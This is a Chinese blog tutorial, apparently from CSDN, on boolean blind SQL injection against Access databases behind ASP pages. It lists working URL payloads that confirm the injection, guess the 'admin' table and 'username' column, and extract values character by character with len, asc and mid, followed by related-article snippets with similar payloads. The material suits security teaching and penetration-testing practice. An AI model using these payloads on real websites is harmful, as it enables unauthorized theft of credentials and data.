SQL注入之access盲注

最新推荐文章于 2023-03-29 10:26:25 发布
原创 最新推荐文章于 2023-03-29 10:26:25 发布 · 1.2k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#access盲注

本文详细介绍了在没有回显的情况下进行Access数据库的SQL盲注技巧。包括两种方法:第一种通过order by、exists和mid等函数猜解数据库内容;第二种利用msysobjects系统表判断数据库类型,并进行表名和列名的探测。内容涵盖猜解长度、ASCII码及表的存在性判断等。

ACCESS盲注:

一般用于没有回显位,无法直接回显数据库内容。
有两种语句方法:

第一种方法:

http://192.168.1.1/news.asp?id=155 order by 1 回显数据库错误,既不可用回显注入。
http://192.168.1.1/news.asp?id=155 and 1=1 返回正常
http://192.168.1.1/news.asp?id=155 and 1=2 返回错误
http://192.168.1.1/news.asp?id=155 and exists(select * from admin(猜的))返回正常既存在,报错既不存在
http://192.168.1.1/news.asp?id=155 and exists(select username from admin)如果admin存在的话,猜列名,username存在返回正常,不存在报错
http://192.168.1.1/news.asp?id=155 and (select top 1 len(username) from admin)=5猜username字段里面的内容长度为5
http://192.168.1.1/news.asp?id=155 and (select top 1 asc(mid(username,1,1)) from admin)=97获取username内容第一位字符的ascii码为97,以此类推,一直猜到第5位字符。

第二种方法:

http://192.168.1.1/news.asp?id=155 and (select count() from msysobjects)>0判断数据库是否为access,msysobjects为access系统表,在web下无权限访问,报错既表示为access数据库。
http://192.168.1.1/news.asp?id=155 and 0<>(select count() from admin),猜表名
http://192.168.1.1/news.asp?id=155 and 1=(select count(*) from admin where len(username)>0)猜列名
http://192.168.1.1/news.asp?id=155 and (select top 1 asc(mid(username,1,1)) from admin)=97
注:asc是将字符转为ascii码 mid是截取字符串,第一个参数是从哪开始,第二个参数是截取位数。

SQL注入详解
渗透之路,攻防之间皆学问
05-05 26万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
ACCESS.SQLserver.Oralce数据库注入详解
最新发布
十步不敢沙人的博客
03-25 941
accessSQL server,oralce数据库注入详细讲解(基础),涉及各种方法注入流行数据库,使用burp爆破工具解析,让知识更自觉进入人脑,欢迎参考
Access数据库练习
Reset
08-13 1201
http://192.168.75.128/common.asp?id=7 and(select top 1 len(admin) from admin_user)>5 显示错误 http://192.168.75.128/common.asp?id=7 and(select top 1 ...
access筛选末位数字为1或5_SQL注入第二章——access,mssql,oracle
weixin_39957835的博客
11-29 476
一、Access注入Access是轻量级数据库,特点是没有库,没有用户,单文件即可存储数据,在SQL注入时必须测表名和列名。Access只有联合注入和布尔。1,联合注入http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=151 order by 1 http://127.0.0.1/Production/PRODUCT_DETAIL.asp?i...
Access数据库基于时间的实现[www.freebuf.com]
weixin_33831196的博客
08-30 396
Microsoft Office Access是由微软发布的关系数据库管理系统。它结合了 Microsoft Jet Database Engine 和 图形用户界面两项特点,是 Microsoft Office 的系统程式之一。0×00概述众所周知,access数据库是不支持基于时间的方式,但是我们可以利用access的系统表MSysAccessObjects,通过多...
access 数据库。。。
weixin_34174132的博客
12-20 520
2019独角兽企业重金招聘Python工程师标准>>> ...
ACCESS之获取网站的管理员账户密码
weixin_48170459的博客
12-05 2165
我们将通过一个网站来熟悉ACCESS 靶机: win2003 我们先在网站的各个地方寻找注入点,发现在id的位置存在一个注入点 接着判断是字符型注入还是数值型注入,发现是数值型注入 1.字符型测试:id=2’ and ‘1’='1或id=2" and “1”="1 2.数值型测试:id=2 and 1=1 接着进行错误注入判断 id=2 and 1=0 判断是否为ACCESS数据库 id=2 and exists(select * from sysobjects) id=2 and exists(
WEB安全 ACCESS 注入脚本
weixin_30266885的博客
12-08 160
http://www.xxx.cn/cp.asp?classid=3http://www.xxx.cn/cp.asp?classid=3 and //有拦截关键字http://www.xxx.cn/cp.asp?classid=3 AND 1=1 //大写绕过http://www.xxx.cn/cp.asp?classid=3 AND 1=2http://www.xxx.cn/cp.asp?...
精选资源
超级SQL注入工具,支持布尔,报错,union注入
03-27
超级SQL注入工具目前支持Bool型、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL注入工具采用C#开发,底层采用Socket发包进行HTTP交互,极大的提升了发包效率,...
精选资源
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
精选资源
SuperSQLInjectionV1:超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包SQL注入工具,采用C#开发,直接操作TCP会话来进行HTTP交互,支持出现在HTTP协议任意位置SQL注入,支持各种类型SQL注入,支持HTTPS模式注入;支持以、错误显示、Union注入等方式来获取数据;支持AccessMySQLSQLServerOraclePostgreSQLDB2SQLiteInformix等数据库;支持手动灵活的进行SQL注入绕过,可自定义进行字符替换等绕过
05-06
超级SQL注入工具 简介: 超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包SQL注入工具,采用C#开发,程序采用自写代码来操作HTTP交互,支持出现在HTTP协议任意位置SQL注入,支持各种类型SQL注入,支持HTTPS...
postgresql+比较简单方法
08-05
该文档讲解了有关postgresql数据库的手段技术,有这方面兴趣的可以学习学习
sql注入-access数据库-总结
weixin_42109829的博客
12-15 1411
Access数据库 是一种非常简单但是功能完整的数据库,很适合小型网站创建,可以很轻松管理表和列,有很多管理工具 手工注入 判断注入点 1.这里采用墨者学院提供的SQL手工注入漏洞测试环境 http://219.153.49.228:40000/new_list.asp?id=1 2.判断注入点标准三连 ’ ~ and 1 ~ and 0 http://219.153.49.228:47744/new_list.asp?id=1' #页面报错 http://219.153.49.228:47744/ne
13-sql注入查询方式及报错
qq_56414082的博客
03-29 754
当进行SQL注入时,有很多注入会出现无回显的情况,其中不回显的原因可能是SQL语句查询方式的问题导致,这个时候我们需要用到相关的报错或进行后续操作,同时作为手工注入时,提前了解或预知其SQL语句大概写法也能更好的选择对应的注入语句。Access暴力解不出的问题?
Access数据库及注入方法
weixin_50464560的博客
08-02 1225
Access数据库 Microsoft Office Access是由微软发布的关系数据库管理系统。Microsoft Office Access是微软把数据库引擎的图形用户界面和软件开发工具结合在一起的一个数据库管理系统。它是微软Office家族的一个成员。Access以它自己的格式将数据存储在基于Access Jet的数据库引擎里。Access数据库属于文件型数据库,所以不需要端口号。 在Office 2007之前的Access数据库文件的后缀是 .mdb ,Office2007及其之后的Access
Access注入
zhuangsle的博客
08-25 847
Access数据库注入 一、注入原理 (一)判断数据库类型 1、前提条件 SQL server中存在内置的变量/系统表(数据库服务器基本上都会有); IIS错误提示没有屏蔽掉,并且SQL server可以返回错误提示; 浏览器能够显示相关的错误提示,一般低版本的ie浏览器可以显示相关的错误信息。 2、通过内置变量判断数据库类型 概述 Access数据中存在一些内置变量,例如User,并且其数据类型被规定为nvarchar,我们可以通过构造SQL语句,提交查询让user与整型数据进行比较,不同数据类型
1-9其他数据库注入
qq_50854662的博客
07-16 365
文章目录 数据库注入access数据库判断access数据库常用函数查询语句构造联合查询布尔型 mssql数据库mssql数据库判断环境---靶机-2k3_sp2常用函数查询语句构造联合查询报错注入布尔型 数据库注入 access数据库 判断access数据库 根据url的后缀。ASP为后缀名的是ACCESS数据库在url后面加单引号,以报错信息“Microsoft ole db provider for odbc.
SQL注入-无回显】布尔:原理、函数、利用过程
06-14 9076
SQL注入-无回显】
手把手教你搭建ASP+ACCESS SQL注入环境
5. SQL注入攻击方法:学习如何通过各种SQL注入技术来测试网站漏洞,如布尔型、时间型、联合查询注入、报错注入等。 6. SQL注入防御策略:了解如何通过输入验证、使用参数化查询、存储过程、预编译语句、ORM...
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值